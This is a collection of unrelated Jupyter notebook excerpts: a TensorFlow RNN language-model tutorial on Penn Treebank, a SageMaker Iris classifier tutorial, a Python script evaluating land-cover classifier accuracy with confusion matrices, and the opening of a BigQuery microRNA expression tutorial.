train_file = 'simple-examples/data/ptb.train.txt'
UNK='<unk>'
def count_words(sentences_file):
counter = {}
for sentence in open(sentences_file):
sentence = sentence.strip()
if not sentence:
continue
words = sentence.split()
for word in words:
counter[word] = counter.get(word, 0) + 1
return counter
counter = count_words(train_file)
print(f'Num unique words: {len(counter)}')
EOS = '<eos>'
```
We will add a special token EOS which signifies end of sentence. We add this to out vocabulary
Let us now write the vocab to file. Since, we are using OrderedDict, we will get words in order...
```
def write_vocab(counter, vocab_file, unk=UNK, eos=EOS):
del counter[unk]
with open(vocab_file, 'w') as fw:
fw.write(f'{unk}\n')
fw.write(f'{eos}\n')
for word, _ in sorted(counter.items(), key=lambda pair:pair[1], reverse=True):
fw.write(f'{word}\n')
vocab_file = 'simple-examples/data/vocab.txt'
write_vocab(counter, vocab_file)
```
Peek at vocab file, see if the words make sense...
```bash
head simple-examples/data/vocab.txt
```
This generates the following:
```
<unk>
<eos>
the
N
of
to
a
in
and
's
```
Next, we want to create a data pipeline, we would create a batch of src words and corresponding target words.
Target words would be shifted right by one. Let us give a concrete example:
**Sentence**: "the cat sat on mat"
**Src_Words:**: ['the', 'cat', 'sat', 'on', 'mat']
**Tgt_Words:**: ['cat', 'sat', 'on', 'mat', '<eos\>']
<img src="data_tx@2x.png" alt="drawing" width="300"/>
Let us begin by creating a vocab table:
```
from tensorflow.python.ops import lookup_ops
vocab_table = lookup_ops.index_table_from_file(vocab_file)
vocab_table.size()
def create_dataset(sentences_file, vocab_table, batch_size, eos=EOS):
#Create a Text Line dataset, which returns a string tensor
dataset = tf.data.TextLineDataset(sentences_file)
#Convert to a list of words..
dataset = dataset.map(lambda sentence: tf.string_split([sentence]).values)
#Create target words right shifted by one, append EOS, also return size of each sentence...
dataset = dataset.map(lambda words: (words, tf.concat([words[1:], [eos]], axis=0), tf.size(words)))
#Lookup words, word->integer, EOS->1
dataset = dataset.map(lambda src_words, tgt_words, num_words: (vocab_table.lookup(src_words), vocab_table.lookup(tgt_words), num_words))
#[None] -> src words, [None] -> tgt_words, [] length of sentence
dataset = dataset.padded_batch(batch_size=batch_size, padded_shapes=([None], [None], []))
return dataset
dataset = create_dataset(train_file, vocab_table, 32)
#Check out sample data!
next(iter(dataset))[2]
```
### P7: RNN Model (revisited)
Now, that we have a way to load up data. Let us see how our RNN model behaves..
```
word_embeddings = Embedding(V=vocab_table.size(), d=128)
datum = next(iter(dataset))
word_vectors = word_embeddings(datum[0])
word_vectors.numpy().shape
rnn = RNN(h=128, cell='rnn')
rnn_outputs = rnn(word_vectors)
print(f'Num outputs: {len(rnn_outputs)} Shape[0]: {rnn_outputs[0].numpy().shape}')
```
#### Zeroing out outputs past real sentence length!
One problem, with our current RNN implementation is that it processes even past the sentence length. For example, length of sentence 0 is 24, but since longest sentence in first batch is of length 48. It returns outputs even past length 24. Let us confirm this:
```
datum[2][0]
rnn_outputs[40][0][:10]
```
We will use static_rnn to deal with the zeroing problem... As you can see, it implements for loop by itself!
```
class StaticRNN(tf.keras.Model):
def __init__(self, h, cell):
super(StaticRNN, self).__init__()
if cell == 'lstm':
self.cell = tf.nn.rnn_cell.BasicLSTMCell(num_units=h)
elif cell == 'gru':
self.cell = tf.nn.rnn_cell.GRUCell(num_units=h)
else:
self.cell = tf.nn.rnn_cell.BasicRNNCell(num_units=h)
def call(self, word_vectors, num_words):
word_vectors_time = tf.unstack(word_vectors, axis=1)
outputs, final_state = tf.nn.static_rnn(cell=self.cell, inputs=word_vectors_time, sequence_length=num_words, dtype=tf.float32)
return outputs
srnn = StaticRNN(h=256, cell='rnn')
rnn_outputs = srnn(word_vectors, datum[2])
rnn_outputs[40][0][:10]
```
### P8: Language Model (Code)
At each time step, we want to predict a probability distribution over the entire vocabulary
Thus, we need to add an output layer
```
class LanguageModel(tf.keras.Model):
def __init__(self, V, d, h, cell):
super(LanguageModel, self).__init__()
self.word_embedding = Embedding(V, d)
self.rnn = StaticRNN(h, cell)
self.output_layer = tf.keras.layers.Dense(units=V)
def call(self, datum):
word_vectors = self.word_embedding(datum[0])
rnn_outputs_time = self.rnn(word_vectors, datum[2])
#We want to convert it back to shape batch_size x TimeSteps x h
rnn_outputs = tf.stack(rnn_outputs_time, axis=1)
logits = self.output_layer(rnn_outputs)
return logits
lm = LanguageModel(vocab_table.size(), 128, 128, 'rnn')
```
What would be the shape of logits returned?
```
logits = lm(datum)
print(f'logits shape {logits.numpy().shape}')
```
### P9: Loss function
* At each time step, RNN makes a prediction
* More concretely it generated 10,000 (V) logits.
We can compute loss by comparing the predictions against true labels. We will use Cross Entropy Loss.
* Cross Entropy measures distance between two probability distributions $p$ and $q$.
* When you have only one class as correct in true distribution. The Cross entropy simplifies to computing the loss of the target word!
<img src="cross_entropy@2x.png" alt="drawing" width="200"/>
* You should never compute the target probability directly. Further as we have our labels with only correct index we would use sparse_softmax_cross_entropy_with_logits. We pass the logits to this method directly!
Now let us get some intuition about the loss values..
First let us compute cross entropy loss for a model that predicts each word equally likely. In this case the probability would be 1/V or 1/10000. This comes out to be 9.21
```
-tf.log(1/10000).numpy()
```
Now, let us see what is the loss for the first prediction on an untrained model!
```
lm = LanguageModel(vocab_table.size(), 128, 128, 'lstm')
logits = lm(datum)
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=datum[1])
print(loss[0][0].numpy())
```
It seems we are not doing any better than making a random prediction! Which is fine as we have not trained our model!
Next, we need to be careful about not adding any loss for the **padded values**.
Let us check out length of first sentence, and see what are loss values past the length
```
print(f'Len of first sentence: {datum[2][0]} Loss[{datum[2][0]}:]={loss[0][datum[2][0]:]}')
```
We actually don't want to accumulate this loss! We will zero it out using sequence mask. Which creates a tensor of 0's and 1's as per the sequence length....
```
mask = tf.sequence_mask(datum[2], dtype=tf.float32)
loss = loss * mask
print(f'Len of first sentence: {datum[2][0]} Loss[{datum[2][0]}:]={loss[0][datum[2][0]:]}')
mask[0]
```
Finally, when we are training we would do it over a batch. In this case 32 sentences with many words in each sentence... Thus, we will compute an average loss over this batch
We compute this by dividing total loss for the batch by total words
```
mask = tf.sequence_mask(datum[2], dtype=tf.float32)
loss = loss * mask
avg_loss = tf.reduce_sum(loss) / tf.reduce_sum(mask)
print(f'Avg loss: {avg_loss}')
def loss_fun(model, datum):
logits = model(datum)
mask = tf.sequence_mask(datum[2], dtype=tf.float32)
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=datum[1]) * mask
return tf.reduce_sum(loss) / tf.cast(tf.reduce_sum(datum[2]), dtype=tf.float32)
```
### P10: Gradients Function
```
loss_and_grads_fun = tfe.implicit_value_and_gradients(loss_fun)
loss_value, gradients_value = loss_and_grads_fun(lm, datum)
print(loss_value)
```
### P11: Training Loop
```
import numpy as np
opt = tf.train.AdamOptimizer(learning_rate=0.001)
NUM_EPOCHS = 10
STATS_STEPS = 50
lm = LanguageModel(vocab_table.size(), 128, 128, 'lstm')
for epoch_num in range(NUM_EPOCHS):
batch_loss = []
for step_num, datum in enumerate(dataset, start=1):
loss_value, gradients = loss_and_grads_fun(lm, datum)
batch_loss.append(loss_value)
if step_num % STATS_STEPS == 0:
print(f'Epoch: {epoch_num} Step: {step_num} Avg Loss: {np.average(np.asarray(loss_value))}')
batch_loss = []
opt.apply_gradients(gradients, global_step=tf.train.get_or_create_global_step())
print(f'Epoch{epoch_num} Done!')
```
Let us check if the loss changed for the first batch!
```
loss_and_grads_fun(lm, datum)[0]
print(f'Old avg p_tgt: {np.exp(-9.21)} New: {np.exp(-loss_and_grads_fun(lm, datum)[0])}')
tf.train.get_or_create_global_step()
```
### P12: Saving your work!
```
import os
checkpoint_dir = 'lm'
checkpoint_prefix = os.path.join(checkpoint_dir, 'ckpt')
root = tfe.Checkpoint(optimizer=opt, model=lm, optimizer_step=tf.train.get_or_create_global_step())
root.save(checkpoint_prefix)
```
| github_jupyter |
# Creating, training, and serving using SageMaker Estimators
The **SageMaker Python SDK** helps you deploy your models for training and hosting in optimized, production ready containers in SageMaker. The SageMaker Python SDK is easy to use, modular, extensible and compatible with TensorFlow and MXNet. This tutorial focuses on **TensorFlow** and shows how we can train and host a TensorFlow DNNClassifier estimator in SageMaker using the Python SDK.
TensorFlow's high-level machine learning API (tf.estimator) makes it easy to
configure, train, and evaluate a variety of machine learning models.
In this tutorial, you'll use tf.estimator to construct a
[neural network](https://en.wikipedia.org/wiki/Artificial_neural_network)
classifier and train it on the
[Iris data set](https://en.wikipedia.org/wiki/Iris_flower_data_set) to
predict flower species based on sepal/petal geometry. You'll write code to
perform the following five steps:
1. Deploy a TensorFlow container in SageMaker
2. Load CSVs containing Iris training/test data from a S3 bucket into a TensorFlow `Dataset`
3. Construct a `tf.estimator.DNNClassifier` neural network classifier
4. Train the model using the training data
5. Host the model in an endpoint
6. Classify new samples invoking the endpoint
This tutorial is a simplified version of TensorFlow's [get_started/estimator](https://www.tensorflow.org/get_started/estimator#fit_the_dnnclassifier_to_the_iris_training_data) tutorial **but using SageMaker and the SageMaker Python SDK** to simplify training and hosting.
## The Iris dataset
The [Iris data set](https://en.wikipedia.org/wiki/Iris_flower_data_set) contains
150 rows of data, comprising 50 samples from each of three related Iris species:
*Iris setosa*, *Iris virginica*, and *Iris versicolor*.
 **From left to right,
[*Iris setosa*](https://commons.wikimedia.org/w/index.php?curid=170298) (by
[Radomil](https://commons.wikimedia.org/wiki/User:Radomil), CC BY-SA 3.0),
[*Iris versicolor*](https://commons.wikimedia.org/w/index.php?curid=248095) (by
[Dlanglois](https://commons.wikimedia.org/wiki/User:Dlanglois), CC BY-SA 3.0),
and [*Iris virginica*](https://www.flickr.com/photos/33397993@N05/3352169862)
(by [Frank Mayfield](https://www.flickr.com/photos/33397993@N05), CC BY-SA
2.0).**
Each row contains the following data for each flower sample:
[sepal](https://en.wikipedia.org/wiki/Sepal) length, sepal width,
[petal](https://en.wikipedia.org/wiki/Petal) length, petal width, and flower
species. Flower species are represented as integers, with 0 denoting *Iris
setosa*, 1 denoting *Iris versicolor*, and 2 denoting *Iris virginica*.
Sepal Length | Sepal Width | Petal Length | Petal Width | Species
:----------- | :---------- | :----------- | :---------- | :-------
5.1 | 3.5 | 1.4 | 0.2 | 0
4.9 | 3.0 | 1.4 | 0.2 | 0
4.7 | 3.2 | 1.3 | 0.2 | 0
… | … | … | … | …
7.0 | 3.2 | 4.7 | 1.4 | 1
6.4 | 3.2 | 4.5 | 1.5 | 1
6.9 | 3.1 | 4.9 | 1.5 | 1
… | … | … | … | …
6.5 | 3.0 | 5.2 | 2.0 | 2
6.2 | 3.4 | 5.4 | 2.3 | 2
5.9 | 3.0 | 5.1 | 1.8 | 2
For this tutorial, the Iris data has been randomized and split into two separate
CSVs:
* A training set of 120 samples
iris_training.csv
* A test set of 30 samples
iris_test.csv
These files are provided in the SageMaker sample data bucket:
**s3://sagemaker-sample-data-{region}/tensorflow/iris**. Copies of the bucket exist in each SageMaker region. When we access the data, we'll replace {region} with the AWS region the notebook is running in.
## Let us first initialize variables
```
from sagemaker import get_execution_role
from sagemaker.session import Session
# S3 bucket for saving code and model artifacts.
# Feel free to specify a different bucket here if you wish.
bucket = Session().default_bucket()
# Location to save your custom code in tar.gz format.
custom_code_upload_location = 's3://{}/customcode/tensorflow_iris'.format(bucket)
# Location where results of model training are saved.
model_artifacts_location = 's3://{}/artifacts'.format(bucket)
#IAM execution role that gives SageMaker access to resources in your AWS account.
role = get_execution_role()
```
# tf.estimator
The tf.estimator framework makes it easy to construct and train machine learning models via its high-level Estimator API. Estimator offers classes you can instantiate to quickly configure common model types such as regressors and classifiers:
* **```tf.estimator.LinearClassifier```**:
Constructs a linear classification model.
* **```tf.estimator.LinearRegressor```**:
Constructs a linear regression model.
* **```tf.estimator.DNNClassifier```**:
Construct a neural network classification model.
* **```tf.estimator.DNNRegressor```**:
Construct a neural network regression model.
* **```tf.estimator.DNNLinearCombinedClassifier```**:
Construct a neural network and linear combined classification model.
* **```tf.estimator.DNNRegressor```**:
Construct a neural network and linear combined regression model.
More information about estimators can be found [here](https://www.tensorflow.org/extend/estimators)
# Construct a deep neural network classifier
## Complete neural network source code
Here is the full code for the neural network classifier:
```
!cat "iris_dnn_classifier.py"
```
With few lines of code, using SageMaker and TensorFlow, you can create a deep neural network model, ready for training and hosting. Let's give a deeper look at the code.
### Using a tf.estimator in SageMaker
Using a TensorFlow estimator in SageMaker is very easy, you can create one with few lines of code:
```
def estimator(model_path, hyperparameters):
feature_columns = [tf.feature_column.numeric_column(INPUT_TENSOR_NAME, shape=[4])]
return tf.estimator.DNNClassifier(feature_columns=feature_columns,
hidden_units=[10, 20, 10],
n_classes=3,
model_dir=model_path)
```
The code above first defines the model's feature columns, which specify the data
type for the features in the data set. All the feature data is continuous, so
`tf.feature_column.numeric_column` is the appropriate function to use to
construct the feature columns. There are four features in the data set (sepal
width, sepal height, petal width, and petal height), so accordingly `shape`
must be set to `[4]` to hold all the data.
Then, the code creates a `DNNClassifier` model using the following arguments:
* `feature_columns=feature_columns`. The set of feature columns defined above.
* `hidden_units=[10, 20, 10]`. Three
[hidden layers](http://stats.stackexchange.com/questions/181/how-to-choose-the-number-of-hidden-layers-and-nodes-in-a-feedforward-neural-netw),
containing 10, 20, and 10 neurons, respectively.
* `n_classes=3`. Three target classes, representing the three Iris species.
* `model_dir=model_path`. The directory in which TensorFlow will save
checkpoint data during model training.
### Describe the training input pipeline
The `tf.estimator` API uses input functions, which create the TensorFlow
operations that generate data for the model.
We can use `tf.estimator.inputs.numpy_input_fn` to produce the input pipeline:
```
def train_input_fn(training_dir, hyperparameters):
training_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=os.path.join(training_dir, 'iris_training.csv'),
target_dtype=np.int,
features_dtype=np.float32)
return tf.estimator.inputs.numpy_input_fn(
x={INPUT_TENSOR_NAME: np.array(training_set.data)},
y=np.array(training_set.target),
num_epochs=None,
shuffle=True)()
```
### Describe the serving input pipeline:
After traininng your model, SageMaker will host it in a TensorFlow serving. You need to describe a serving input function:
```
def serving_input_fn(hyperparameters):
feature_spec = {INPUT_TENSOR_NAME: tf.FixedLenFeature(dtype=tf.float32, shape=[4])}
return tf.estimator.export.build_parsing_serving_input_receiver_fn(feature_spec)()
```
Now we are ready to submit the script for training.
# Train a Model on Amazon SageMaker using TensorFlow custom code
We can use the SDK to run our local training script on SageMaker infrastructure.
1. Pass the path to the iris_dnn_classifier.py file, which contains the functions for defining your estimator, to the sagemaker.TensorFlow init method.
2. Pass the S3 location that we uploaded our data to previously to the fit() method.
```
from sagemaker.tensorflow import TensorFlow
iris_estimator = TensorFlow(entry_point='iris_dnn_classifier.py',
role=role,
framework_version='1.12.0',
output_path=model_artifacts_location,
code_location=custom_code_upload_location,
train_instance_count=1,
train_instance_type='ml.c4.xlarge',
training_steps=1000,
evaluation_steps=100)
%%time
import boto3
# use the region-specific sample data bucket
region = boto3.Session().region_name
train_data_location = 's3://sagemaker-sample-data-{}/tensorflow/iris'.format(region)
iris_estimator.fit(train_data_location)
```
# Deploy the trained Model
The deploy() method creates an endpoint which serves prediction requests in real-time.
```
%%time
iris_predictor = iris_estimator.deploy(initial_instance_count=1,
instance_type='ml.m4.xlarge')
```
# Invoke the Endpoint to get inferences
Invoking prediction:
```
iris_predictor.predict([6.4, 3.2, 4.5, 1.5]) #expected label to be 1
```
# (Optional) Delete the Endpoint
After you have finished with this example, remember to delete the prediction endpoint to release the instance(s) associated with it.
```
print(iris_predictor.endpoint)
import sagemaker
sagemaker.Session().delete_endpoint(iris_predictor.endpoint)
```
| github_jupyter |
```
import os
import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score, cohen_kappa_score, classification_report, precision_score, recall_score, f1_score, precision_recall_fscore_support
def gather_accuracy_values_per_class(classes,targets,scores):
"""
Gather per class a variety of accuracy metrics from targets and scores
"""
y_pred = np.argmax(scores,axis=1)
y_true = np.argmax(targets,axis=1)
precision_, recall_, fscore_, support_ = precision_recall_fscore_support(y_true, y_pred, beta=0.5, average=None)
fscore = pd.Series(index=classes, data=fscore_, name="f-score")
precision = pd.Series(index=classes, data=precision_, name="precision")
recall = pd.Series(index=classes, data=recall_, name="recall")
support = pd.Series(index=classes, data=support_, name="support")
s = [fscore,precision,recall, support]
names = [el.name for el in s]
return pd.DataFrame(zip(*s), columns=names, index=recall.index).T
import numpy as np
from sklearn.metrics import roc_curve, roc_auc_score, accuracy_score, cohen_kappa_score, classification_report, precision_score, recall_score, f1_score, precision_recall_fscore_support
def gather_mean_accuracies(classes, scores, targets, average='weighted', label="label", b=0):
"""
calculate a series for mean accuracy values for all, covered (class id < b) and fields (class id > b)
"""
metrics = []
y_pred = np.argmax(scores,axis=1)
y_true = np.argmax(targets,axis=1)
all_mask = np.ones(y_true.shape)
covered_mask = y_true<b
field_mask = y_true>=b
# class weighted average accuracy
w_all = np.ones(y_true.shape[0])
for idx, i in enumerate(np.bincount(y_true)):
w_all[y_true == idx] *= (i/float(y_true.shape[0]))
w_cov = np.ones(y_true[covered_mask].shape[0])
for idx, i in enumerate(np.bincount(y_true[covered_mask])):
w_cov[y_true[covered_mask] == idx] *= (i/float(y_true[covered_mask].shape[0]))
w_field = np.ones(y_true[field_mask].shape[0])
for idx, i in enumerate(np.bincount(y_true[field_mask])):
w_field[y_true[field_mask] == idx] *= (i/float(y_true[field_mask].shape[0]))
w_acc = accuracy_score(y_true, y_pred, sample_weight=w_all)
#w_acc_cov = accuracy_score(y_true[covered_mask], y_pred[covered_mask], sample_weight=w_cov)
w_acc_field = accuracy_score(y_true[field_mask], y_pred[field_mask], sample_weight=w_field)
#metrics.append(pd.Series(data=[w_acc, w_acc_cov, w_acc_field], dtype=float, name="accuracy"))
metrics.append(pd.Series(data=[w_acc, w_acc_field], dtype=float, name="accuracy"))
# AUC
try:
# if AUC not possible skip
auc = roc_auc_score(targets, scores, average=average)
#auc_cov = roc_auc_score(targets[covered_mask,:b], scores[covered_mask,:b], average=average)
auc_field = roc_auc_score(targets[field_mask,b:], scores[field_mask,b:], average=average)
#metrics.append(pd.Series(data=[auc, auc_cov, auc_field], dtype=float, name="AUC"))
metrics.append(pd.Series(data=[auc, auc_field], dtype=float, name="AUC"))
except:
print "no AUC calculated"
pass
# Kappa
kappa = cohen_kappa_score(y_true, y_pred)
#kappa_cov = cohen_kappa_score(y_true[covered_mask], y_pred[covered_mask])
kappa_field = cohen_kappa_score(y_true[field_mask], y_pred[field_mask])
#metrics.append(pd.Series(data=[kappa, kappa_cov, kappa_field], dtype=float, name="kappa"))
metrics.append(pd.Series(data=[kappa, kappa_field], dtype=float, name="kappa"))
# Precision, Recall, F1, support
prec, rec, f1, support = precision_recall_fscore_support(y_true, y_pred, beta=1, average=average)
#prec_cov, rec_cov, f1_cov, support_cov = precision_recall_fscore_support(y_true[covered_mask], y_pred[covered_mask], beta=1, average=average)
prec_field, rec_field, f1_field, support_field = precision_recall_fscore_support(y_true[field_mask], y_pred[field_mask], beta=1, average=average)
#metrics.append(pd.Series(data=[prec, prec_cov, prec_field], dtype=float, name="precision"))
#metrics.append(pd.Series(data=[rec, rec_cov, rec_field], dtype=float, name="recall"))
#metrics.append(pd.Series(data=[f1, f1_cov, f1_field], dtype=float, name="fscore"))
#sup_ = pd.Series(data=[support, support_cov, support_field], dtype=int, name="support")
metrics.append(pd.Series(data=[prec, prec_field], dtype=float, name="precision"))
metrics.append(pd.Series(data=[rec, rec_field], dtype=float, name="recall"))
metrics.append(pd.Series(data=[f1, f1_field], dtype=float, name="fscore"))
df_ = pd.DataFrame(metrics).T
if label is not None:
#df_.index = [[label,label,label],["all","cov","fields"]]
df_.index = [[label,label],["all","fields"]]
else:
df_.index = ["all","cov","fields"]
df_.index = ["all","fields"]
return df_
savedir = '/scratch/acocac/externalpred/MT_seasonal_all_38classes/models/regular/aggregated/51557/2004/pred/MTseasonalsmp100class38'
#best_runs = ['1l1r50d1f','3l1r50d1f','3l1r50d1f']
#networks = ['lstm','rnn','cnn']
best_runs = ['1l1r50d1f']
networks = ['lstm']
from sklearn.metrics import confusion_matrix
# border in the classes between field classes and coverage
b = 0
obs_file = "eval_observations.npy"
probs_file = "eval_probabilities.npy"
targets_file = "eval_targets.npy"
conf_mat_file = "eval_confusion_matrix.npy"
# drop fc for now:
#networks = [networks[0], networks[2]]
#best_runs = [best_runs[0], best_runs[2]]
#etworklabels = ["LSTM","RNN","CNN"]
networklabels = ["LSTM"]
classes = np.array(["agriculture", "forest","grassland","wetland","settlement","shrubland","sparce","bare","water"])
#over_accuracy_label = "ov. accuracy2"
# ignore <obs_limit> first observations
obs_limit = 0
acc=[]
mean = []
for best_run, network, label_ in zip(best_runs,networks,networklabels):
print network
path = os.path.join(savedir,network,best_run)
#obs = np.load(os.path.join(path,obs_file))
scores = np.load(os.path.join(path,probs_file))
targets = np.load(os.path.join(path,targets_file))
#if os.path.exists(os.path.join(path,conf_mat_file)):
# cm = np.load(os.path.join(path,conf_mat_file))
#else:
y_pred = np.argmax(scores,axis=1)
y_true = np.argmax(targets,axis=1)
cm = confusion_matrix(y_true,y_pred)
#classes = fix_typos(
# list(np.load(os.path.join(path,class_file)))
# )
#df_, a_ = acc_mean_accuracies(cm, classes, label_, b, scores,targets)
df_ = gather_mean_accuracies(classes, scores, targets, b=b, label=label_)
mean.append(df_)
mean_df = pd.concat(mean)
mean_df
from mpl_toolkits.axes_grid1 import make_axes_locatable
def plot_confusion_matrix(confusion_matrix, classes, normalize_axis=None, figsize=(7, 7), colormap=None):
"""
Plots a confusion matrix using seaborn heatmap functionality
@param confusion_matrix: np array [n_classes, n_classes] with rows reference and cols predicted
@param classes: list of class labels
@param normalize_axis: 0 sum of rows, 1: sum of cols, None no normalization
@return matplotlib figure
"""
# Set up the matplotlib figure
plt.figure()
f, ax = plt.subplots(figsize=figsize)
# normalize
normalized_str = "" # add on at the title
if normalize_axis is not None:
with np.errstate(divide='ignore'): # ignore divide by zero and replace with 0
confusion_matrix = np.nan_to_num(
confusion_matrix.astype(float) / np.sum(confusion_matrix, axis=normalize_axis))
# Draw the heatmap with the mask and correct aspect ratio
g = sns.heatmap(confusion_matrix,
square=True,
linewidths=1,
cbar=False,
ax=ax,
cmap=colormap, vmin=0, vmax=1)
divider = make_axes_locatable(g)
cax = divider.append_axes("right", size="5%", pad=0.05)
cbar = g.figure.colorbar(ax.collections[0],cax=cax)
if normalize_axis == 0:
cbar.set_label("precision")
if normalize_axis == 1:
cbar.set_label("recall")
n_classes = len(classes)
# if n_classes < threshold plot values in plot
cols = np.arange(0, n_classes)
rows = np.arange(n_classes - 1, -1, -1)
#g.set_title("Confusion Matrix")
g.set_xticklabels([])
g.set_yticklabels(classes[::-1], rotation=0)
g.set_xlabel("predicted")
g.set_ylabel("reference")
return f, g
from sklearn.metrics import confusion_matrix
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
#networks = ["lstm","rnn","cnn"]
networks = ["lstm"]
def calc_confusion_matrix(path):
probs_file = "eval_probabilities.npy"
targets_file = "eval_targets.npy"
scores = np.load(os.path.join(path,probs_file))
targets = np.load(os.path.join(path,targets_file))
y_pred = np.argmax(scores,axis=1)
y_true = np.argmax(targets,axis=1)
cm = confusion_matrix(y_true,y_pred)
return cm
cms_prec = []
cms_rec = []
for best_run, network in zip(best_runs, networks):
path = os.path.join(savedir, network, best_run)
cm = calc_confusion_matrix(path)
cms_prec.append(cm.astype(float)/np.sum(cm,axis=0))
cms_rec.append(cm.astype(float)/np.sum(cm,axis=1))
# add SVM
#cms_prec.append(cm_SVM.astype(float)/np.sum(cm_SVM,axis=0))
#cms_rec.append(cm_SVM.astype(float)/np.sum(cm_SVM,axis=1))
#pd.DataFrame(unroll_cms(cms_prec)).to_csv(os.path.join(image_filepath,"confmatprecision.dat"), sep=' ', header=False, index=False)
#pd.DataFrame(unroll_cms(cms_rec)).to_csv(os.path.join(image_filepath,"confmatrecall.dat"), sep=' ', header=False, index=False)
cm = cms_prec[0]
# Generate a custom diverging colormap
cmap = sns.color_palette("Blues")
figsize=(6,6)
f,ax = plot_confusion_matrix(cm, classes[::-1], figsize=figsize, normalize_axis=0, colormap = "Blues")
#dat_filepath = os.path.join(image_filepath,"confusion_matrix.dat")
#pdf_filepath = os.path.join(image_filepath,"confusion_matrix.pdf")
#tikz_filepath = os.path.join(image_filepath,"confusion_matrix.tikz")
# double checked at http://stackoverflow.com/questions/20927368/python-how-to-normalize-a-confusion-matrix
precision = cm/np.sum(cm,axis=0)
recall = cm/np.sum(cm,axis=1)
# uncomment to save
#if False:
#f.savefig(os.path.join(image_filepath,"confusion_matrix.pdf"),transparent=True)
#tikz_save(tikz_filepath)
# pd.DataFrame(cm).to_csv(os.path.join(image_filepath,"confusion_matrix.dat"), sep=' ', header=False, index=False)
# pd.DataFrame(precision).to_csv(os.path.join(image_filepath,"confusion_matrix_prec.dat"), sep=' ', header=False, index=False)
# pd.DataFrame(recall).to_csv(os.path.join(image_filepath,"confusion_matrix_recall.dat"), sep=' ', header=False, index=False)
# pd.DataFrame(classes).to_csv(os.path.join(image_filepath,"confusion_matrix.labels"), sep=' ', header=False, index=False)
```
## Influence of element in sequence
```
#networks = ['lstm','rnn','cnn']
networks = ['lstm','rnn','cnn']
lstm_network, _, _ = networks
lstm_best, _, _ = best_runs
path = os.path.join(savedir, lstm_network, lstm_best)
obs = np.load(os.path.join(path,obs_file))
scores = np.load(os.path.join(path,probs_file))
targets = np.load(os.path.join(path,targets_file))
#from sklearn.metrics import confusion_matrix
b = 0 #filter all non cloud classes
def get_obs_subset(targets,scores,obs,obs_idx, b, classes):
"""
This function calls the gather_mean_accuracies, which is used for the calculation of accuracy tables
on a subset of targets and scores filtered by obs_idx
"""
# select by observation
sc = scores[obs==obs_idx]
ta = targets[obs==obs_idx]
return gather_mean_accuracies(classes, sc, ta, average='weighted', label="label", b=0)
#a = get_obs_subset(targets,scores,3, b, classes)
sc = scores[obs==22]
ta = targets[obs==22]
gather_mean_accuracies(classes, sc, ta, average='weighted', label="label", b=0)
t = pd.Series(range(1,365,16))
# gather accuracy values for fields
#from util.db import conn
import sklearn
#t = pd.read_sql("select distinct doa, doy from products order by doa",conn)["doy"]
#t.to_pickle(os.path.join("loc","t.pkl"))
#t = pd.read_pickle(os.path.join("loc","t.pkl"))
def collect_data_per_obs(targets, scores, obs, classes, metric="accuracy", classcategory="all"):
"""
this function calculates `metric` based on scores and targets for each available observations `t` 0..25
This function takes a
- target matrix resembling ground thruth,
- scores as calculated probablities for each observation
- obs as indices of observation
"""
#oa = []
outlist=[]
for i in range(len(t)):
try:
per_class_ = get_obs_subset(targets,scores,obs,i, b, classes)
#per_class.append(per_class_.mean(axis=0))
# append the average <classcategory> <metric> at each time i
outlist.append(per_class_.loc["label"].loc[classcategory][metric])
except:
print "t{} could not calculate accuracy metrics".format(i)
outlist.append(None)
pass
#oa.append(oa_)
print "Collecting doy {} ({}/{})".format(t[i],i+1,len(t))
#oa_s = pd.Series(data=oa, name=over_accuracy_label, index=t)
return pd.DataFrame(outlist, index=t)
def collect_data_for_each_network(networks, best_runs, metric="kappa", classcategory="all"):
"""
This function calls collect_data_per_obs for each network.
First targets, scores and obs are loaded from file at the respective network's best run model
Then collect_data_per_obs is called.
"""
acc_dfs = []
for network, best in zip(networks, best_runs):
path = os.path.join(savedir, network, best)
obs = np.load(os.path.join(path,obs_file))
scores = np.load(os.path.join(path,probs_file))
targets = np.load(os.path.join(path,targets_file))
print
print network
# for every network append a dataframe of observations
observations_df_ = collect_data_per_obs(targets, scores, obs, classes, metric=metric, classcategory=classcategory)
acc_dfs.append(observations_df_.values.reshape(-1))
# create final DataFrame with proper column and indexes of all three networks
return pd.DataFrame(acc_dfs, index=networks,columns=t).T
acc_df = collect_data_for_each_network(networks, best_runs, metric="accuracy", classcategory="all")
rec_df = collect_data_for_each_network(networks, best_runs, metric="recall", classcategory="all")
kappa_df = collect_data_for_each_network(networks, best_runs, metric="kappa", classcategory="all")
prec_df = collect_data_for_each_network(networks, best_runs, metric="precision", classcategory="all")
acc_df.T
x = range(len(t))
def plot_acctime(x,acc_df,metric="measure"):
f,ax = plt.subplots()
#ax.plot(x,oa_s.values, label="overall accuracy")
for col in acc_df.columns:
ax.plot(x,acc_df[col].values, label=col)
plt.xticks(x,t, rotation='vertical')
ax.set_xlabel("day of year")
ax.set_ylabel(metric)
plt.legend()
# 0 lstm, 1 rnn, 2 cnn
#plot_acctime(x,prec_df)
plot_acctime(x,acc_df,metric="accuracy")
```
| github_jupyter |
# microRNA expression (BCGSC RPKM)
The goal of this notebook is to introduce you to the microRNA expression BigQuery table.
This table contains all available TCGA Level-3 microRNA expression data produced by BCGSC's microRNA pipeline using the Illumina HiSeq platform, as of July 2016. The most recent archive (*eg* ``bcgsc.ca_THCA.IlluminaHiSeq_miRNASeq.Level_3.1.9.0``) for each of the 32 tumor types was downloaded from the DCC, and data extracted from all files matching the pattern ``%.isoform.quantification.txt``. The isoform-quantification values were then processed through a Perl script provided by BCGSC which produces normalized expression levels for *mature* microRNAs. Each of these mature microRNAs is identified by name (*eg* hsa-mir-21) and by MIMAT accession number (*eg* MIMAT0000076).
In order to work with BigQuery, you need to import the python bigquery module (`gcp.bigquery`) and you need to know the name(s) of the table(s) you are going to be working with:
```
import gcp.bigquery as bq
miRNA_BQtable = bq.Table('isb-cgc:tcga_201607_beta.miRNA_Expression')
```
From now on, we will refer to this table using this variable ($miRNA_BQtable), but we could just as well explicitly give the table name each time.
Let's start by taking a look at the table schema:
```
%bigquery schema --table $miRNA_BQtable
```
